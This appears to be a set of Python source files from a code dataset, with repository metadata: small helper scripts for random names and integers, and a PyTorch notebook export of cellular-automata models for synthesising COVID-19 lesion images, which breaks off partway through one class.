| 54.884615 | 113 | 0.712284 | 1,271 | 9,989 | 5.397325 | 0.088906 | 0.150437 | 0.171429 | 0.163265 | 0.914286 | 0.914286 | 0.909475 | 0.882653 | 0.877114 | 0.873178 | 0 | 0.016366 | 0.174192 | 9,989 | 181 | 114 | 55.187845 | 0.81525 | 0.021924 | 0 | 0.75817 | 0 | 0 | 0.121581 | 0.068012 | 0 | 0 | 0 | 0 | 0.535948 | 1 | 0.026144 | false | 0 | 0.026144 | 0 | 0.058824 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
64a98181d44f28dd2971020bcbaf25452ead0b83 | 41 | py | Python | develop/src/rawdata_builder/__init__.py | pjw960408/binance-trader-c1 | dae91cc721591257334ab1ddcf3a4f6d86644435 | [
"MIT"
] | null | null | null | develop/src/rawdata_builder/__init__.py | pjw960408/binance-trader-c1 | dae91cc721591257334ab1ddcf3a4f6d86644435 | [
"MIT"
] | null | null | null | develop/src/rawdata_builder/__init__.py | pjw960408/binance-trader-c1 | dae91cc721591257334ab1ddcf3a4f6d86644435 | [
"MIT"
] | 1 | 2021-05-06T14:14:56.000Z | 2021-05-06T14:14:56.000Z | from .build_rawdata import build_rawdata
| 20.5 | 40 | 0.878049 | 6 | 41 | 5.666667 | 0.666667 | 0.705882 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.097561 | 41 | 1 | 41 | 41 | 0.918919 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
b3c9f85c92e0d95e7e5a588eda50f835acc4bb85 | 250 | py | Python | src/lqc/generate/css/util/integer.py | tysmith/layout-quickcheck | c5ba9431a40f650a594140541e32af7c8ff21695 | [
"MIT"
] | 2 | 2021-03-05T19:00:21.000Z | 2021-03-15T18:23:04.000Z | src/lqc/generate/css/util/integer.py | tysmith/layout-quickcheck | c5ba9431a40f650a594140541e32af7c8ff21695 | [
"MIT"
] | 7 | 2021-03-05T19:10:28.000Z | 2021-10-20T19:26:18.000Z | src/lqc/generate/css/util/integer.py | tysmith/layout-quickcheck | c5ba9431a40f650a594140541e32af7c8ff21695 | [
"MIT"
] | 1 | 2021-09-27T18:56:34.000Z | 2021-09-27T18:56:34.000Z | from random import choice, randint
MAX_NUMBER = 2000
prefixes = ["", "+", "-"]
def generate_prefix():
return choice(prefixes)
def generate():
prefix = generate_prefix()
number = randint(0, MAX_NUMBER)
return f"{prefix}{number}"
| 15.625 | 35 | 0.656 | 29 | 250 | 5.517241 | 0.517241 | 0.2625 | 0.2375 | 0.3125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025 | 0.2 | 250 | 15 | 36 | 16.666667 | 0.775 | 0 | 0 | 0 | 1 | 0 | 0.072 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0.111111 | 0.111111 | 0.555556 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 8 |
b3dc459c21a7e820048a88c7737092ffc6888b22 | 407 | py | Python | name building software.py | Ayush2007A/Code-master | fafe4a020adc3f8e78c78f6b8b2b08b5c3005613 | [
"Unlicense"
] | 1 | 2021-02-05T10:29:30.000Z | 2021-02-05T10:29:30.000Z | name building software.py | Ayush2007A/Code-master | fafe4a020adc3f8e78c78f6b8b2b08b5c3005613 | [
"Unlicense"
] | null | null | null | name building software.py | Ayush2007A/Code-master | fafe4a020adc3f8e78c78f6b8b2b08b5c3005613 | [
"Unlicense"
] | null | null | null | import random
s_letters=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']
c_letters=['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z']
print(random.choice(c_letters)+random.choice(s_letters)+random.choice(s_letters)+random.choice(s_letters)+random.choice(s_letters)+random.choice(s_letters))
| 81.4 | 157 | 0.523342 | 83 | 407 | 2.46988 | 0.373494 | 0.234146 | 0.463415 | 0.487805 | 0.843902 | 0.843902 | 0.843902 | 0.843902 | 0.843902 | 0.843902 | 0 | 0 | 0.022113 | 407 | 4 | 158 | 101.75 | 0.515075 | 0 | 0 | 0 | 0 | 0 | 0.129032 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0.25 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
377f8e0bfe1df5b5e5aa7b62ab4b9ca25f265b69 | 41,130 | py | Python | c19_synthesis/cellular_automata.py | octaviomtz/nbdev_c19_synthesis | 45079757af6c05c3763d5c7147f566862171de9b | [
"Apache-2.0"
] | null | null | null | c19_synthesis/cellular_automata.py | octaviomtz/nbdev_c19_synthesis | 45079757af6c05c3763d5c7147f566862171de9b | [
"Apache-2.0"
] | null | null | null | c19_synthesis/cellular_automata.py | octaviomtz/nbdev_c19_synthesis | 45079757af6c05c3763d5c7147f566862171de9b | [
"Apache-2.0"
] | null | null | null | # AUTOGENERATED! DO NOT EDIT! File to edit: 01_cellular_automata.ipynb (unless otherwise specified).
__all__ = ['to_rgb', 'correct_label_in_plot', 'create_sobel_and_identity', 'prepare_seed', 'epochs_in_inner_loop',
'ca_model_baseline', 'ca_model_perception', 'plot_loss_and_lesion_synthesis', 'ca_model_perception_clamp',
'ca_model_step_size', 'CeA_00', 'ca_model_laplacian_regularizer', 'ca_model_l2reg']
# Cell
import cv2
import torch
import numpy as np
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
import matplotlib.pyplot as plt
from IPython.display import Image, HTML, clear_output
import matplotlib
import io
import sys
# Cell
def to_rgb(img, channel=1):
'''return visible channel'''
# rgb, a = img[:,:,:1], img[:,:,1:2]
rgb, a = img[:,:,:channel], img[:,:,channel:channel+1]
return 1.0-a+rgb
# Cell
def correct_label_in_plot(model):
'''get a string with the network architecture to print in the figure'''
# https://www.kite.com/python/answers/how-to-redirect-print-output-to-a-variable-in-python
old_stdout = sys.stdout
new_stdout = io.StringIO()
sys.stdout = new_stdout
print(model);
output = new_stdout.getvalue()
sys.stdout = old_stdout
model_str = [i.split(', k')[0] for i in output.split('\n')]
model_str_layers = [i.split(':')[-1] for i in model_str[2:-3]]
model_str = [model_str[0]]+model_str_layers
model_str = str(model_str).replace("', '",'\n')
return model_str
# Cell
def create_sobel_and_identity(device='cuda'):
ident = torch.tensor([[0.0,0.0,0.0],[0.0,1.0,0.0],[0.0,0.0,0.0]]).to(device)
sobel_x = (torch.tensor([[-1.0,0.0,1.0],[-2.0,0.0,2.0],[-1.0,0.0,1.0]])/8.0).to(device)
lap = (torch.tensor([[1.0,2.0,1.0],[2.0,-12,2.0],[1.0,2.0,1.0]])/16.0).to(device)
return ident, sobel_x, lap
# Cell
def prepare_seed(target, this_seed, device, num_channels = 16, pool_size = 1024):
# prepare seed
height, width, _ = np.shape(target)
seed = np.zeros([1, height, width, num_channels], np.float32)
for i in range(num_channels-1):
seed[:,..., i+1] = this_seed
# Preparing the seed pool
seed_tensor = torch.tensor(seed).permute(0,-1,1,2).to(device)
seed_pool = torch.repeat_interleave(seed_tensor, repeats = pool_size, dim = 0)
return seed, seed_tensor, seed_pool
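# Returned shapes for an (H, W, C) target with the default arguments (worked illustration):
#   seed:        numpy array of shape (1, H, W, 16)
#   seed_tensor: torch tensor of shape (1, 16, H, W) on `device`
#   seed_pool:   torch tensor of shape (1024, 16, H, W)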
# Cell
def epochs_in_inner_loop(i, inner_iter_aux=0, inner_iter=0, thresh_do_nothing=100, thresh_do_something=200, increase=10, inner_iter_max=100):
if i < thresh_do_nothing:
inner_iter = 100
elif i % thresh_do_something == 0:
inner_iter_aux = inner_iter_aux + increase
inner_iter = np.min([inner_iter_aux, inner_iter_max])
else:
        inner_iter = inner_iter
return inner_iter, inner_iter_aux
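# Schedule produced with the default thresholds (worked values, no extra behaviour added):
# the inner loop runs 100 CA steps while i < 100; afterwards the budget only changes on
# multiples of `thresh_do_something`, growing by `increase` up to `inner_iter_max`.
#   epochs_in_inner_loop(50)                                     -> (100, 0)
#   epochs_in_inner_loop(150, inner_iter_aux=0, inner_iter=100)  -> (100, 0)
#   epochs_in_inner_loop(200, inner_iter_aux=0)                  -> (10, 10)
#   epochs_in_inner_loop(400, inner_iter_aux=10)                 -> (20, 20)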
# Cell
class ca_model_baseline(nn.Module):
def __init__(self, checkpoint = None, seq_layers = None, device = 'cuda'):
'''
Kind of a modular class for a CA model
args:
checkpoint = 'path/to/model.pt'
seq_layers = nn.Sequential(your, pytorch, layers)
device = 'cuda' or 'cpu'
'''
super(ca_model_baseline, self).__init__()
self.ident = torch.tensor([[0.0,0.0,0.0],[0.0,1.0,0.0],[0.0,0.0,0.0]]).to(device)
self.sobel_x = (torch.tensor([[-1.0,0.0,1.0],[-2.0,0.0,2.0],[-1.0,0.0,1.0]])/8.0).to(device)
self.lap = (torch.tensor([[1.0,2.0,1.0],[2.0,-12,2.0],[1.0,2.0,1.0]])/16.0).to(device)
if seq_layers is not None:
self.model = seq_layers
else:
self.model = nn.Sequential(
nn.Conv2d(64, 256, kernel_size = 3,padding =1, bias = True),
nn.ReLU(),
nn.Conv2d(256, 256, kernel_size = 3,padding =1, bias = True),
nn.ReLU(),
nn.Conv2d(256, 16, kernel_size = 1, bias = True),
)
'''
initial condition for "do nothing" behaviour:
* all biases should be zero
* the weights of the last layer should be zero
'''
for l in range(len(self.model)):
if isinstance(self.model[l], nn.Conv2d):
self.model[l].bias.data.fill_(0)
if l == len(self.model) -1:
self.model[l].weight.data.fill_(0)
if checkpoint is not None:
self.load_state_dict(torch.load(checkpoint))
self.to(device= device)
def perchannel_conv(self, x, filters):
'''filters: [filter_n, h, w]'''
b, ch, h, w = x.shape
y = x.reshape(b*ch, 1, h, w)
y = torch.nn.functional.pad(y, [1, 1, 1, 1], 'circular')
y = torch.nn.functional.conv2d(y, filters[:,None])
return y.reshape(b, -1, h, w)
def perception(self, x):
filters = torch.stack([self.ident, self.sobel_x, self.sobel_x.T, self.lap])
return self.perchannel_conv(x, filters)
def normalize_grads(self):
'''
gradient normalization for constant step size and to avoid spikes
'''
for p in self.parameters():
p.grad.data = p.grad.data/(p.grad.data.norm()+1e-8)
def get_alive_mask(self, x):
'''
looks for cells that have values over 0.1,
and allows only their adjacent cells to participate in growth
'''
alpha = x[:,1:2,:,:]
pooled = (F.max_pool2d(alpha, 3,1, padding =1 ) > 0.1).float()
return pooled
def train_step(self, seed, target, target_loss_func, epochs_inside, masked_loss=False):
'''
a single training step for the model,
feel free to play around with different loss functions like L1 loss
        the loss is calculated for only the leading image/alpha channels of the output
'''
x = seed
for i in range(epochs_inside):
x, alive_mask = self.forward(x)
target_loss = target_loss_func(x[:,:2, :,:], target) # used to synthesize almost all nodules
loss = target_loss
return loss, x, alive_mask.cpu().numpy() #batch_mean_rmse_per_pixel.detach().cpu().numpy()
def forward(self, x):
'''
nice little forward function for the model
1. fetches an alive mask
2. generates another random mask of 0's and 1's
3. updates the input
4. applies alive mask
'''
alive_mask = self.get_alive_mask(x)
mask = torch.clamp(torch.round(torch.rand_like(x[:,:1,:,:])) , 0,1)
y = self.perception(x)
out = x + self.model(y)*mask
out *= alive_mask
return out, alive_mask
# Cell
class ca_model_perception(nn.Module):
def __init__(self, checkpoint = None, seq_layers = None, device = 'cuda'):
'''
Kind of a modular class for a CA model
args:
checkpoint = 'path/to/model.pt'
seq_layers = nn.Sequential(your, pytorch, layers)
device = 'cuda' or 'cpu'
'''
super(ca_model_perception, self).__init__()
self.ident = torch.tensor([[0.0,0.0,0.0],[0.0,1.0,0.0],[0.0,0.0,0.0]]).to(device)
self.sobel_x = (torch.tensor([[-1.0,0.0,1.0],[-2.0,0.0,2.0],[-1.0,0.0,1.0]])/8.0).to(device)
self.lap = (torch.tensor([[1.0,2.0,1.0],[2.0,-12,2.0],[1.0,2.0,1.0]])/16.0).to(device)
if seq_layers is not None:
self.model = seq_layers
else:
self.model = nn.Sequential(
nn.Conv2d(64, 256, kernel_size = 3,padding =1, bias = True),
nn.ReLU(),
nn.Conv2d(256, 256, kernel_size = 3,padding =1, bias = True),
nn.ReLU(),
nn.Conv2d(256, 16, kernel_size = 1, bias = True),
)
'''
initial condition for "do nothing" behaviour:
* all biases should be zero
* the weights of the last layer should be zero
'''
for l in range(len(self.model)):
if isinstance(self.model[l], nn.Conv2d):
self.model[l].bias.data.fill_(0)
if l == len(self.model) -1:
self.model[l].weight.data.fill_(0)
if checkpoint is not None:
self.load_state_dict(torch.load(checkpoint))
self.to(device= device)
def perchannel_conv(self, x, filters):
'''filters: [filter_n, h, w]'''
b, ch, h, w = x.shape
y = x.reshape(b*ch, 1, h, w)
y = torch.nn.functional.pad(y, [1, 1, 1, 1], 'circular')
y = torch.nn.functional.conv2d(y, filters[:,None])
return y.reshape(b, -1, h, w)
def perception(self, x):
filters = torch.stack([self.ident, self.sobel_x, self.sobel_x.T, self.lap])
return self.perchannel_conv(x, filters)
def normalize_grads(self):
'''
gradient normalization for constant step size and to avoid spikes
'''
for p in self.parameters():
p.grad.data = p.grad.data/(p.grad.data.norm()+1e-8)
def get_alive_mask(self, x):
'''
looks for cells that have values over 0.1,
and allows only their adjacent cells to participate in growth
'''
alpha = x[:,1:2,:,:]
pooled = (F.max_pool2d(alpha, 3,1, padding =1 ) > 0.1).float()
return pooled
def train_step(self, seed, target, target_loss_func, iters, current_epoch = 1000, masked_loss=False):
'''
a single training step for the model,
feel free to play around with different loss functions like L1 loss
        the loss is calculated for only the leading image/alpha channels of the output
'''
x = seed
for i in range(iters):
x, alive_mask = self.forward(x,i, current_epoch)
# print(x[:,:4, :,:].shape, target.shape)
# batch_mean_rmse_per_pixel = torch.mean(torch.sqrt((x[:,:1, :,:] - target)**2),dim=0)
batch_mean_rmse_per_pixel = torch.mean(torch.sqrt((x[:,0, :,:] - target[:,0,:,:])**2),dim=0)
if masked_loss == True:
alive_mask_dilated = (F.max_pool2d(alive_mask[0], 3,1, padding =1 ) > 0.1).float()
# alive_mask_dilated = torch.from_numpy(binary_closing(alive_mask[0].cpu().numpy() > 0.1)).float().to('cuda')
target_loss = target_loss_func(x[:,:1, :,:] * alive_mask_dilated, target * alive_mask_dilated)
else:
target_loss = target_loss_func(x[:,:2, :,:] * target[:,1:,...], target * target[:,1:,...]) # used to synthesize almost all nodules
loss = target_loss
return loss, x, alive_mask.cpu().numpy() #batch_mean_rmse_per_pixel.detach().cpu().numpy()
def forward(self, x, i, current_epoch):
'''
nice little forward function for the model
1. fetches an alive mask
2. generates another random mask of 0's and 1's
3. updates the input
4. applies alive mask
'''
if current_epoch < 100:
alive_mask = self.get_alive_mask(x)
else:
if i % 3 == 0:
alive_mask = self.get_alive_mask(x)
else:
# alive_mask = self.get_alive_mask(x)
alive_mask = (x[:,1:2,:,:] > 0.1).float()
mask = torch.clamp(torch.round(torch.rand_like(x[:,:1,:,:])) , 0,1)
y = self.perception(x)
out = x + self.model(y)*mask
out *= alive_mask
return out, alive_mask
# Cell
def plot_loss_and_lesion_synthesis(losses, optimizer, model_str, i, loss, sample_size, out):
clear_output(True)
f, (ax0, ax1) = plt.subplots(2, 1, figsize=(12,10), gridspec_kw={'height_ratios': [4, 1]})
lr_info = f'\nlr_init={optimizer.param_groups[0]["initial_lr"]:.1E}\nlr_last={optimizer.param_groups[0]["lr"]:.1E}'
model_str_final = model_str+lr_info
ax0.plot(losses, label=model_str_final)
ax0.set_yscale('log')
ax0.legend(loc='upper right', fontsize=16)
stack = []
for z in range(sample_size):
stack.append(to_rgb(out[z].permute(-2, -1,0).cpu().detach().numpy()))
ax1.imshow(np.clip(np.hstack(np.squeeze(stack)), 0,1))
ax1.axis('off')
plt.show()
print(i, loss.item(), flush = True)
return model_str_final
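# --- Usage sketch (not part of the original notebook) ------------------------------
# A minimal illustration of how the helpers and models above fit together. The target
# size, learning rate, epoch counts and the square "lesion" are assumptions made for
# this example only; the original experiments use real lesion patches.
def _example_training_loop(device='cuda'):
    # synthetic 2-channel target: channel 0 = image intensities, channel 1 = lesion mask
    target_np = np.zeros([32, 32, 2], np.float32)
    target_np[12:20, 12:20, :] = 1.0
    _, seed_tensor, _ = prepare_seed(target_np, this_seed=0.0, device=device)
    seed_tensor[:, 1, 16, 16] = 1.0  # a single alive cell (alpha channel) in the centre
    target = torch.tensor(target_np).permute(-1, 0, 1).unsqueeze(0).to(device)
    model = ca_model_perception(device=device)
    optimizer = optim.Adam(model.parameters(), lr=1e-3)
    loss_fn = nn.MSELoss()
    losses, inner_iter, inner_iter_aux = [], 0, 0
    for epoch in range(300):
        inner_iter, inner_iter_aux = epochs_in_inner_loop(epoch, inner_iter_aux, inner_iter)
        optimizer.zero_grad()
        loss, out, _ = model.train_step(seed_tensor.clone(), target, loss_fn,
                                        inner_iter, current_epoch=epoch)
        loss.backward()
        model.normalize_grads()  # constant step size, avoids gradient spikes (see above)
        optimizer.step()
        losses.append(loss.item())
        # plot_loss_and_lesion_synthesis(...) can be called here to monitor progress
    return losses, out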
# Cell
class ca_model_perception_clamp(nn.Module):
def __init__(self, checkpoint = None, seq_layers = None, device = 'cuda'):
'''
Kind of a modular class for a CA model
args:
checkpoint = 'path/to/model.pt'
seq_layers = nn.Sequential(your, pytorch, layers)
device = 'cuda' or 'cpu'
'''
super(ca_model_perception_clamp, self).__init__()
self.ident = torch.tensor([[0.0,0.0,0.0],[0.0,1.0,0.0],[0.0,0.0,0.0]]).to(device)
self.sobel_x = (torch.tensor([[-1.0,0.0,1.0],[-2.0,0.0,2.0],[-1.0,0.0,1.0]])/8.0).to(device)
self.lap = (torch.tensor([[1.0,2.0,1.0],[2.0,-12,2.0],[1.0,2.0,1.0]])/16.0).to(device)
if seq_layers is not None:
self.model = seq_layers
else:
self.model = nn.Sequential(
nn.Conv2d(64, 256, kernel_size = 3,padding =1, bias = True),
nn.ReLU(),
nn.Conv2d(256, 256, kernel_size = 3,padding =1, bias = True),
nn.ReLU(),
nn.Conv2d(256, 16, kernel_size = 1, bias = True),
)
'''
initial condition for "do nothing" behaviour:
* all biases should be zero
* the weights of the last layer should be zero
'''
for l in range(len(self.model)):
if isinstance(self.model[l], nn.Conv2d):
self.model[l].bias.data.fill_(0)
if l == len(self.model) -1:
self.model[l].weight.data.fill_(0)
if checkpoint is not None:
self.load_state_dict(torch.load(checkpoint))
self.to(device= device)
def perchannel_conv(self, x, filters):
'''filters: [filter_n, h, w]'''
b, ch, h, w = x.shape
y = x.reshape(b*ch, 1, h, w)
y = torch.nn.functional.pad(y, [1, 1, 1, 1], 'circular')
y = torch.nn.functional.conv2d(y, filters[:,None])
return y.reshape(b, -1, h, w)
def perception(self, x):
filters = torch.stack([self.ident, self.sobel_x, self.sobel_x.T, self.lap])
return self.perchannel_conv(x, filters)
def normalize_grads(self):
'''
gradient normalization for constant step size and to avoid spikes
'''
for p in self.parameters():
p.grad.data = p.grad.data/(p.grad.data.norm()+1e-8)
def get_alive_mask(self, x):
'''
looks for cells that have values over 0.1,
and allows only their adjacent cells to participate in growth
'''
alpha = x[:,1:2,:,:]
pooled = (F.max_pool2d(alpha, 3,1, padding =1 ) > 0.1).float()
return pooled
def train_step(self, seed, target, target_loss_func, iters, current_epoch = 1000, masked_loss=False):
'''
a single training step for the model,
feel free to play around with different loss functions like L1 loss
        the loss is calculated for only the leading image/alpha channels of the output
'''
x = seed
for i in range(iters):
x, alive_mask, mask_diff = self.forward(x,i, current_epoch)
# print(x[:,:4, :,:].shape, target.shape)
# batch_mean_rmse_per_pixel = torch.mean(torch.sqrt((x[:,:1, :,:] - target)**2),dim=0)
batch_mean_rmse_per_pixel = torch.mean(torch.sqrt((x[:,0, :,:] - target[:,0,:,:])**2),dim=0)
if masked_loss == True:
alive_mask_dilated = (F.max_pool2d(alive_mask[0], 3,1, padding =1 ) > 0.1).float()
# alive_mask_dilated = torch.from_numpy(binary_closing(alive_mask[0].cpu().numpy() > 0.1)).float().to('cuda')
target_loss = target_loss_func(x[:,:1, :,:] * alive_mask_dilated, target * alive_mask_dilated)
else:
target_loss = target_loss_func(x[:,:2, :,:] * target[:,1:,...], target * target[:,1:,...]) # used to synthesize almost all nodules
loss = target_loss
return loss, x, alive_mask.cpu().numpy(), mask_diff.cpu().numpy() #batch_mean_rmse_per_pixel.detach().cpu().numpy()
def forward(self, x, i, current_epoch):
'''
nice little forward function for the model
1. fetches an alive mask
2. generates another random mask of 0's and 1's
3. updates the input
4. applies alive mask
'''
mask_previous = alive_mask = (x[:,1:2,:,:] > 0.1).float()
if current_epoch < 100:
alive_mask = self.get_alive_mask(x)
else:
if i % 3 == 0:
alive_mask = self.get_alive_mask(x)
else:
# alive_mask = self.get_alive_mask(x)
alive_mask = (x[:,1:2,:,:] > 0.1).float()
mask_diff = alive_mask - mask_previous
mask = torch.clamp(torch.round(torch.rand_like(x[:,:1,:,:])) , 0,1)
y = self.perception(x)
mask_new_cells_clamped = torch.clip((1-mask_diff)+.19,0,1) #make sure this is only applied to the first channel
mask_new_cells_clamped_ones = torch.ones_like(torch.squeeze(mask_new_cells_clamped))
mask_new_cells_clamped2 = torch.repeat_interleave(mask_new_cells_clamped,16,1)
        for idx_channel in np.arange(1,16,1):
            mask_new_cells_clamped2[:,idx_channel,:,:] = mask_new_cells_clamped_ones
out = x + self.model(y)*mask*mask_new_cells_clamped2
out *= alive_mask
return out, alive_mask, mask_diff
# Cell
class ca_model_step_size(nn.Module):
def __init__(self, checkpoint = None, seq_layers = None, device = 'cuda', grow_on_k_iter=3, background_intensity=.19, step_size=1, scale_mask=1):
'''
Kind of a modular class for a CA model
args:
checkpoint = 'path/to/model.pt'
seq_layers = nn.Sequential(your, pytorch, layers)
device = 'cuda' or 'cpu'
'''
super(ca_model_step_size, self).__init__()
self.ident = torch.tensor([[0.0,0.0,0.0],[0.0,1.0,0.0],[0.0,0.0,0.0]]).to(device)
self.sobel_x = (torch.tensor([[-1.0,0.0,1.0],[-2.0,0.0,2.0],[-1.0,0.0,1.0]])/8.0).to(device)
self.lap = (torch.tensor([[1.0,2.0,1.0],[2.0,-12,2.0],[1.0,2.0,1.0]])/16.0).to(device)
self.grow_on_k_iter = grow_on_k_iter
self.background_intensity = background_intensity
self.step_size = step_size
self.scale_mask = scale_mask
if seq_layers is not None:
self.model = seq_layers
else:
self.model = nn.Sequential(
nn.Conv2d(64, 256, kernel_size = 3,padding =1, bias = True),
nn.ReLU(),
nn.Conv2d(256, 256, kernel_size = 3,padding =1, bias = True),
nn.ReLU(),
nn.Conv2d(256, 16, kernel_size = 1, bias = True),
)
'''
initial condition for "do nothing" behaviour:
* all biases should be zero
* the weights of the last layer should be zero
'''
for l in range(len(self.model)):
if isinstance(self.model[l], nn.Conv2d):
self.model[l].bias.data.fill_(0)
if l == len(self.model) -1:
self.model[l].weight.data.fill_(0)
if checkpoint is not None:
self.load_state_dict(torch.load(checkpoint))
self.to(device= device)
def perchannel_conv(self, x, filters):
'''filters: [filter_n, h, w]'''
b, ch, h, w = x.shape
y = x.reshape(b*ch, 1, h, w)
y = torch.nn.functional.pad(y, [1, 1, 1, 1], 'circular')
y = torch.nn.functional.conv2d(y, filters[:,None])
return y.reshape(b, -1, h, w)
def perception(self, x):
filters = torch.stack([self.ident, self.sobel_x, self.sobel_x.T, self.lap])
return self.perchannel_conv(x, filters)
def normalize_grads(self):
'''
gradient normalization for constant step size and to avoid spikes
'''
for p in self.parameters():
p.grad.data = p.grad.data/(p.grad.data.norm()+1e-8)
def get_alive_mask(self, x):
'''
looks for cells that have values over 0.1,
and allows only their adjacent cells to participate in growth
'''
alpha = x[:,1:2,:,:]
pooled = (F.max_pool2d(alpha, 3,1, padding =1 ) > 0.1).float()
return pooled
def train_step(self, seed, target, target_loss_func, iters, current_epoch = 1000, masked_loss=False):
'''
a single training step for the model,
feel free to play around with different loss functions like L1 loss
        the loss is calculated for only the leading image/alpha channels of the output
'''
x = seed
for i in range(iters):
x, alive_mask, other_mask = self.forward(x,i, current_epoch)
# print(x[:,:4, :,:].shape, target.shape)
# batch_mean_rmse_per_pixel = torch.mean(torch.sqrt((x[:,:1, :,:] - target)**2),dim=0)
batch_mean_rmse_per_pixel = torch.mean(torch.sqrt((x[:,0, :,:] - target[:,0,:,:])**2),dim=0)
if masked_loss == True:
alive_mask_dilated = (F.max_pool2d(alive_mask[0], 3,1, padding =1 ) > 0.1).float()
# alive_mask_dilated = torch.from_numpy(binary_closing(alive_mask[0].cpu().numpy() > 0.1)).float().to('cuda')
target_loss = target_loss_func(x[:,:1, :,:] * alive_mask_dilated, target * alive_mask_dilated)
else:
target_loss = target_loss_func(x[:,:2, :,:] * target[:,1:,...], target * target[:,1:,...]) # used to synthesize almost all nodules
loss = target_loss
return loss, x, alive_mask.cpu().numpy(), other_mask.cpu().numpy() #batch_mean_rmse_per_pixel.detach().cpu().numpy()
def forward(self, x, i, current_epoch):
'''
nice little forward function for the model
1. fetches an alive mask
2. generates another random mask of 0's and 1's
3. updates the input
4. applies alive mask
'''
mask_previous = alive_mask = (x[:,1:2,:,:] > 0.1).float()
if current_epoch < 100:
alive_mask = self.get_alive_mask(x)
else:
if i % self.grow_on_k_iter == 0:
alive_mask = self.get_alive_mask(x)
else:
alive_mask = (x[:,1:2,:,:] > 0.1).float()
mask_diff = alive_mask - mask_previous
mask_new_cells_clamped = torch.clip((1-mask_diff) + self.background_intensity,0,self.step_size) #make sure this is only applied to the first channel
mask_new_cells_clamped_ones = torch.ones_like(torch.squeeze(mask_new_cells_clamped))*self.scale_mask
mask_new_cells_clamped2 = torch.repeat_interleave(mask_new_cells_clamped,16,1)
for idx_channel in np.arange(1,16,1):
mask_new_cells_clamped2[:,idx_channel,:,:] = mask_new_cells_clamped_ones
mask = torch.clamp(torch.round(torch.rand_like(x[:,:1,:,:])) , 0,1) # original mask used
y = self.perception(x)
out = x + self.model(y)*mask*mask_new_cells_clamped2
out *= alive_mask
return out, alive_mask, mask_new_cells_clamped2
# Cell
class CeA_00(nn.Module):
def __init__(self, checkpoint = None, seq_layers = None, device = 'cuda', grow_on_k_iter=3, background_intensity=.19, step_size=1, scale_mask=1, pretrain_thres=100):
'''
Kind of a modular class for a CA model
args:
checkpoint = 'path/to/model.pt'
seq_layers = nn.Sequential(your, pytorch, layers)
device = 'cuda' or 'cpu'
'''
super(CeA_00, self).__init__()
self.ident = torch.tensor([[0.0,0.0,0.0],[0.0,1.0,0.0],[0.0,0.0,0.0]]).to(device)
self.sobel_x = (torch.tensor([[-1.0,0.0,1.0],[-2.0,0.0,2.0],[-1.0,0.0,1.0]])/8.0).to(device)
self.lap = (torch.tensor([[1.0,2.0,1.0],[2.0,-12,2.0],[1.0,2.0,1.0]])/16.0).to(device)
self.grow_on_k_iter = grow_on_k_iter
self.background_intensity = background_intensity
self.step_size = step_size
self.scale_mask = scale_mask
self.pretrain_thres = pretrain_thres
if seq_layers is not None:
self.model = seq_layers
else:
self.model = nn.Sequential(
nn.Conv2d(64, 256, kernel_size = 3,padding =1, bias = True),
nn.ReLU(),
nn.Conv2d(256, 256, kernel_size = 3,padding =1, bias = True),
nn.ReLU(),
nn.Conv2d(256, 16, kernel_size = 1, bias = True),
)
'''
initial condition for "do nothing" behaviour:
* all biases should be zero
* the weights of the last layer should be zero
'''
for l in range(len(self.model)):
if isinstance(self.model[l], nn.Conv2d):
self.model[l].bias.data.fill_(0)
if l == len(self.model) -1:
self.model[l].weight.data.fill_(0)
if checkpoint is not None:
self.load_state_dict(torch.load(checkpoint))
self.to(device= device)
def perchannel_conv(self, x, filters):
'''filters: [filter_n, h, w]'''
b, ch, h, w = x.shape
y = x.reshape(b*ch, 1, h, w)
y = torch.nn.functional.pad(y, [1, 1, 1, 1], 'circular')
y = torch.nn.functional.conv2d(y, filters[:,None])
return y.reshape(b, -1, h, w)
def perception(self, x):
filters = torch.stack([self.ident, self.sobel_x, self.sobel_x.T, self.lap])
return self.perchannel_conv(x, filters)
def normalize_grads(self):
'''
gradient normalization for constant step size and to avoid spikes
'''
for p in self.parameters():
p.grad.data = p.grad.data/(p.grad.data.norm()+1e-8)
def get_alive_mask(self, x):
'''
looks for cells that have values over 0.1,
and allows only their adjacent cells to participate in growth
'''
alpha = x[:,1:2,:,:]
pooled = (F.max_pool2d(alpha, 3,1, padding =1 ) > 0.1).float()
return pooled
def train_step(self, seed, target, target_loss_func, epochs_inside, epoch_outside = 1000, masked_loss=False):
'''
a single training step for the model,
feel free to play around with different loss functions like L1 loss
        the loss is calculated for only the leading image/alpha channels of the output
'''
x = seed
